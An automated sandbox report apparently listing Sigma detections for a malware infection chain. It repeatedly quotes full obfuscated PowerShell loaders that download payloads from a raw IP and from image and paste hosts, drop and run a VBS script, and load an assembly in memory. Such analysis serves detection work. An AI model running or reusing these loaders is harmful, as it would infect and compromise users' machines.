ZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9y

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", ProcessId: 5092, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4824, TargetFilename: C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4824, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sheismygirlwholovedmealotstillalsoshelovesmetruly.vbs" , ProcessId: 1776, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4824, TargetFilename: C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZMTnpVbmZMRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAienZqIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNwYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTll4UWQ0bEE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE0Mi42MC81NTEvc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseWZyb210aGVoZWFydC50SUYiLCIkRU52OkFQUERBVEFcc2hlaXNteWdpcmx3aG9sb3ZlZG1lYWxvdHN0aWxsYWxzb3NoZWxvdmVzbWV0cnVseS52YnMiLDAsMCk7U1RhUnQtc0xlZXAoMyk7aW5WT0tFLWV4cFJlU3NJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzaGVpc215Z2lybHdob2xvdmVkbWVhbG90c3RpbGxhbHNvc2hlbG92ZXNtZXRydWx5LnZicyI='+[CHar]0X22+'))')))", CommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; InVoke-ExPReSsIon($(InVoKE-ExpRESsIoN('[SYstEm.teXT.eNCOding]'+[cHAr]0x3A+[CHar]0x3a+'Utf8.GEtstRinG([SYstEM.convERT]'+[cHAR]0x3a+[cHAR]0x3A+'frOmbasE64STRing('+[CHAr]34+'JE5ZeFFkNGxBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3lRQW1WSklRb0csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRbSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElyR2RwSHZTTWwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gxlowwdn\gxlowwdn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: poweRSHELl.EXe -Ex ByPAss -nOP -W 1 -c DeVIcEcrEDeNtIAldEPLoYMENt.ExE ; 